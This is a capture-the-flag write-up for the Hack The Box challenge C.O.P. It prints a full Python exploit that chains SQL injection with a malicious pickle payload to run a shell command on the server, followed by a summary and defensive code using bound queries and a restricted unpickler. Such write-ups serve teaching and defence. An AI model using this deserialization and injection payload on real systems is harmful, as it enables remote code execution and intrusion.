Explore the basics of cybersecurity in the C.O.P Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/395

Description

The C.O.P (Cult of Pickles) have started up a new web store to sell their merch. We believe that the funds are being used to carry out illicit pickle-based propaganda operations! Investigate the site and try and find a way into their operation!

Exploitation

#!/usr/bin/python3
import requests,pickle,base64,sys,os

def get_base_url():
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    host, port = sys.argv[1].split(':')
    return f"http://{host}:{port}"

class RCE:
    def __reduce__(self):
        return (os.system, (payload_command,))

def create_malicious_pickle():
    malicious_object = RCE()
    pickled_payload = pickle.dumps(malicious_object)
    encoded_payload = base64.urlsafe_b64encode(pickled_payload).decode('ascii')
    return encoded_payload

def inject_payload(encoded_payload):
    injection_url = f"{TARGET_URL}1' UNION SELECT '{encoded_payload}'-- "
    response = requests.get(injection_url)
    if response.status_code == 200:
        print("[+] Payload injected successfully.")
    else:
        print(f"[-] Injection failed with status code: {response.status_code}")
        print("Server response:", response.text)

def check_flag_file():
    response = requests.get(STATIC_FILE_URL)
    if response.status_code == 200:
        print("[+] Flag file accessed successfully!")
        print(response.text, end='')
    else:
        print("[-] Could not access the flag file. The exploit may not have worked.")

BASE_URL = get_base_url()
TARGET_URL = f"{BASE_URL}/view/"
STATIC_FILE_URL = f"{BASE_URL}/static/flag.txt"
payload_command = 'cp /app/flag.txt /app/application/static/flag.txt'

if __name__ == "__main__":
    encoded_payload = create_malicious_pickle()
    print(f"[+] Generated payload: {encoded_payload}")
    inject_payload(encoded_payload)
    check_flag_file()

Summary

C.O.P is an easy-level challenge on Hack The Box that combines insecure deserialization and SQL injection to achieve remote code execution (RCE). A malicious Python object is serialized using pickle and encoded in Base64. The payload is injected via an SQLi vulnerability in the view endpoint, executing a command to copy the flag file to a publicly accessible directory. The flag is then retrieved from the static directory, highlighting the risks of insecure deserialization and improper input sanitization in web applications.
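The defensive counterpart to the two flaws summarized above, as an added example that is not the challenge's own code: the lookup binds the id as a query parameter, and the stored value is loaded with an unpickler that refuses every global reference. The `products` table, its `data` column, the sample row and all function names are assumptions made for illustration, since the page does not show the application's schema.

```python
import base64
import io
import pickle
import sqlite3


class NoGlobalsUnpickler(pickle.Unpickler):
    """Unpickler that loads plain data only (dict, list, str, int, ...)."""

    def find_class(self, module, name):
        # Every global lookup in a pickle stream lands here. A __reduce__
        # payload needs one to name its callable, so refusing all blocks it.
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_loads(encoded):
    """Decode a URL-safe base64 pickle and load it without resolving globals."""
    raw = base64.urlsafe_b64decode(encoded)
    return NoGlobalsUnpickler(io.BytesIO(raw)).load()


def make_demo_db():
    # Constructed sample store (hypothetical schema): one product whose
    # data column holds a base64-encoded pickle of a plain dict.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, data TEXT)")
    item = {"name": "Pickle Shirt", "price": "23.00"}
    blob = base64.urlsafe_b64encode(pickle.dumps(item)).decode("ascii")
    conn.execute("INSERT INTO products (id, data) VALUES (?, ?)", (1, blob))
    return conn


def get_product(conn, product_id):
    # Bound parameter: the value is compared as data and never parsed as SQL,
    # so a UNION appended to the id cannot contribute an attacker-chosen row.
    row = conn.execute(
        "SELECT data FROM products WHERE id = ?", (product_id,)
    ).fetchone()
    return safe_loads(row[0]) if row else None


if __name__ == "__main__":
    db = make_demo_db()
    print(get_product(db, 1))                          # the stored dict
    print(get_product(db, "1' UNION SELECT 'x'-- "))  # None: no such id
```

Either control alone breaks the chain described in the summary; storing the item as JSON instead of a pickle removes the deserialization risk entirely.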